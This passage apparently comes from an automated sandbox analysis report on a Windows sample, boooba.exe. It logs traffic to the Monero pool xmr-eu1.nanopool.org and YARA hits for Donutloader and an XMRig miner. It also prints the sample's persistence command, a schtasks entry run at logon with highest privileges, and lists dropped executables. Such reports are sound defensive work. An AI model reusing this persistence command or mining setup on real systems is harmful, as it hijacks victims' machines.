                                                                Oct 30, 2024 11:42:37.532932997 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:37.647228003 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:37.880022049 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:37.975353956 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:47.432581902 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:47.647270918 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:42:47.685528994 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:42:47.881653070 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:00.559580088 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:00.647356987 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:00.688911915 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:00.772289038 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:09.518081903 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:09.647301912 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:10.668694973 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:10.787911892 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:20.488769054 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:20.647335052 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:20.669874907 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:20.772357941 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:29.516242027 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:29.647351980 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:30.916131973 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:31.084836960 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:40.519223928 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:40.647470951 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:40.650868893 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:40.881767035 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:50.484646082 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:50.647427082 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:43:50.791806936 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:43:50.975529909 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:44:00.516897917 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:44:00.647448063 CET4973110300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:44:00.840754032 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:44:00.881789923 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:44:09.475711107 CET1030049730212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:44:09.584939003 CET4973010300192.168.2.4212.47.253.124
                                                                Oct 30, 2024 11:44:10.243458986 CET1030049731212.47.253.124192.168.2.4
                                                                Oct 30, 2024 11:44:10.459959984 CET4973110300192.168.2.4212.47.253.124

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 30, 2024 11:42:10.630589008 CET6309053192.168.2.41.1.1.1
                                                                Oct 30, 2024 11:42:10.641957045 CET53630901.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 30, 2024 11:42:10.630589008 CET192.168.2.41.1.1.10x6cf7Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                Oct 30, 2024 11:42:10.641957045 CET1.1.1.1192.168.2.40x6cf7No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:06:41:56
                                                                Start date:30/10/2024
                                                                Path:C:\Users\user\Desktop\boooba.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\boooba.exe"
                                                                Imagebase:0x400000
                                                                File size:2'234'368 bytes
                                                                MD5 hash:EF9E6A4BAB77A1E5ED51669EABEBA31D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:06:41:59
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:06:42:00
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff746900000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:06:42:00
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:06:42:00
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff76f990000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:06:42:02
                                                                Start date:30/10/2024
                                                                Path:C:\Users\user\IOAshdohSha.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\IOAshdohSha.exe
                                                                Imagebase:0x400000
                                                                File size:2'234'368 bytes
                                                                MD5 hash:EF9E6A4BAB77A1E5ED51669EABEBA31D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 71%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:06:42:03
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff746900000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:06:42:03
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:06:42:03
                                                                Start date:30/10/2024
                                                                Path:C:\Users\user\IOAshdohSha.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\IOAshdohSha.exe
                                                                Imagebase:0x400000
                                                                File size:2'234'368 bytes
                                                                MD5 hash:EF9E6A4BAB77A1E5ED51669EABEBA31D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:06:42:05
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:06:42:06
                                                                Start date:30/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                Imagebase:0x400000
                                                                File size:31'744 bytes
                                                                MD5 hash:6A7E9885A2D01DF564B46F8F27258853
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 74%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:06:42:06
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
